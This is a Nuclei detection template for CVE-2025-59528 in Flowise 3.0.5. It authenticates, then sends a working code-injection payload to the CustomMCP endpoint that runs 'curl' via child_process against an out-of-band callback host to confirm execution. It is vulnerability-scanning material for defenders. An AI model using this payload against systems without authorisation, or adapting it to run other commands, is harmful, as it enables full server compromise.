id: CVE-2025-59528 info: name: Flowise - Remote Code Execution author: xtr0nix severity: critical description: | Flowise 3.0.5 contains a remote code execution vulnerability caused by unsafe evaluation of user input in the CustomMCP node's convertToValidJSONString function, letting remote attackers execute arbitrary code with full Node.js privileges, exploit requires user input to be processed by the vulnerable node. impact: | Attackers can execute arbitrary code with full Node.js privileges, potentially leading to full system compromise. remediation: | Update to version 3.0.6 or later. reference: - https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-3gcm-f6qx-ff7p - https://nvd.nist.gov/vuln/detail/CVE-2025-59528 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10 cve-id: CVE-2025-59528 epss-score: 0.90183 epss-percentile: 0.99782 cwe-id: CWE-94 metadata: verified: true max-request: 2 tags: cve,cve2025,flowise,rce,authenticated,vkev flow: http(1) && http(2) http: - raw: - | POST /api/v1/auth/login HTTP/1.1 Host: {{Hostname}} Content-Type: application/json {"email":"{{email}}","password":"{{password}}"} matchers: - type: dsl dsl: - 'contains(content_type, "application/json")' - 'contains_all(body, "id", "email", "name")' - 'status_code == 200' condition: and internal: true - raw: - | POST /api/v1/node-load-method/customMCP HTTP/1.1 Host: {{Hostname}} Content-Type: application/json x-request-from: internal {"loadMethod":"listActions","inputs":{"mcpServerConfig":"({x:(function(){const cp=process.mainModule.require(\"child_process\");cp.execSync(\"curl {{interactsh-url}}\");return 1;})()})"}} matchers: - type: dsl dsl: - 'contains(interactsh_protocol, "dns")' - 'contains(content_type, "application/json")' - 'contains(body, "No Available Actions")' - 'status_code == 200' condition: and # digest: 490a00463044021f548064f72d71ef4ab207cf82561e0d678412f662455b8a1925d7f9623bf5ad0221008f37805ce5d6f45e098a4fa34d005f54a97ead38d2446f8ec071dff76743a45f:922c64590222798bb761d5b6d8e72950